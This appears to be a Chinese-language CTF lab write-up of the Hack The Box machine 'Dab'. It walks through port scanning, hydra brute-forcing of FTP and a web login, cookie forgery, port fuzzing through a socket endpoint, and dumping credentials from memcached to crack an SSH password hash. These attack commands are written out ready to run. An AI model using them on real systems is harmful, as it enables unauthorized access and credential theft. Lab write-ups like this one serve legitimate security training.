Dab(path fuzz)

scan

1
2
3
4
5
6
7
8
9
10
11
12
nmap -sV -p 21,22,80 10.10.10.86

Starting Nmap 7.60 ( https://nmap.org ) at 2018-12-18 15:10 +08
Nmap scan report for 10.10.10.86
Host is up (0.29s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.10.3 (Ubuntu)
8080/tcp open  http    nginx 1.10.3 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

全端口检查

1
2
3
4
Discovered open port 8080/tcp on 10.10.10.86                                   
Discovered open port 21/tcp on 10.10.10.86                                     
Discovered open port 80/tcp on 10.10.10.86                                     
Discovered open port 22/tcp on 10.10.10.86    

没发现其他开放端口

port

22

用msf ssh用户枚举模块,检查存在的用户 4

info1: user.txt

1
2
3
4
5
6
7
8
9
10
11
12
root
bin
daemon
lp
sync
mail
news
uucp
games
ftp
nobody
backup

21

ftp 10.10.10.86

1
2
3
4
5
6
7
8
9
10
11
12
13
14
trying1:检查弱密码
hydra -l root -P /usr/share/wordlists/long-pass-rockyou.txt ftp://10.10.10.86

trying2:检查ftp服务版本漏洞
msfconsole
search type:auxiliary ftp

trying3:匿名用户登陆
ftp 10.10.10.86
anonymous

ftp获得了一个dab.jpg,貌似没什么用

hydra -l dab -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.86

3 ftp可读不可写。

80

2

根据数据包,可以用hydra爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /login HTTP/1.1

Host: 10.10.10.86

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: http://10.10.10.86/login

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 38

username=000&password=999&submit=Login
1
2
3
4
5
6
7
hydra -L /usr/share/wordlists/linux-user.txt -P /usr/share/wordlists/370-pass.txt 10.10.10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error"

hydra -l dab -P /usr/share/wordlists/500-worst-passwords.txt 10.10.10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error"

hydra -L rockyou.txt -P rockyou.txt 10.10.10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error"

sqlmap -r post.txt --dbs --level 5

没有任何关于web口令的进展。

目录扫描

gobuster扫描存在的目录有:

1
2
http://10.10.10.86/login
http://10.10.10.86:8080/socket

nginx 1.10.3漏洞

http://www.91ri.org/9064.html 解析漏洞

8080

1
2
3
http://10.10.10.86:8080
Internal Dev
Access denied: password authentication cookie not set 

14

1
2
3
 dirb http://10.10.10.86:8080/socket/
dirb http://10.10.10.86:8080/socket?
可能是wfuzz出参数,然后命令执行

trying:

利用info1的字典,用hydra得到了可登录的账号。

hydra -L user.txt -P /usr/share/wordlists/500-worst-passwords.txt 10.10.10.86 ftp

5

info2 : ftp账号

1
2
3
4
5
6
[21][ftp] host: 10.10.10.86   login: ftp   password: 123456
[21][ftp] host: 10.10.10.86   login: ftp   password: 12345678
[21][ftp] host: 10.10.10.86   login: ftp   password: pussy
[21][ftp] host: 10.10.10.86   login: ftp   password: 12345
[21][ftp] host: 10.10.10.86   login: ftp   password: password
[21][ftp] host: 10.10.10.86   login: ftp   password: 1234

writeup

通过暴力破解,得到admin/Password1,作为密码,进入80端口。

参考这篇文章Cookie: password=secret,用插件cookie editor修改cookie.

通过验证进入页面后,发现一个tcp连接的php脚本

http://10.10.10.86:8080/socket?port=22&cmd=11

通过fuzz,获取开放的端口。

1
wfuzz -c --hc=500 -z range,1-65535 -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=FUZZ&cmd=11'

17

开放的端口除了已知的,还有11211,Memory cache service,内存缓存服务。

免费和开源,高性能,分布式内存对象缓存系统,本质上是通用的,但旨在通过减轻数据库负载来加速动态Web应用程序。

搜索“memcached cheat sheet(备忘单)”,得知服务的使用方式。

https://lzone.de/cheat-sheet/memcached


http://10.10.10.86:8080/socket?port=11211&cmd=stats+slabs

http://10.10.10.86:8080/socket?port=11211&cmd=get+users

6

获得了一系列数据,将这些数据保存为json.

1
2
jq . test.json | awk -F\" '{print $2}' > /root/Desktop/10.10.10.86/user.lst
jq . test.json | awk -F\" '{print $4}' > /root/Desktop/10.10.10.86/pass.lst

再次ssh扫描可用用户

1
2
3
4
msfconsole
use scanner/ssh/ssh_enumusers
set RHOSTS 10.10.10.86
set USER_FILE /root/Desktop/10.10.10.86/user.lst

genevieve 是有效用户名

jq . test.json | grep genevieve获得了加密的hashfc7992e8952a8ff5000cb7856d8586d2

12 在线解密结果:Princess1

ssh genevieve@10.10.10.86

总结

值得反思的是,关于弱密码,应该在vps上部署脚本,然后自动化探测。

这个靶机做不出来,很正常的。。。没见过的服务,入侵思路都找不到。

如何检查一张图片中是否有隐藏的信息

1
2
3
4
exiftool xx.jpg
strings xx.jpg|less
binwalk xx.jpg
xxd xx.jpg |less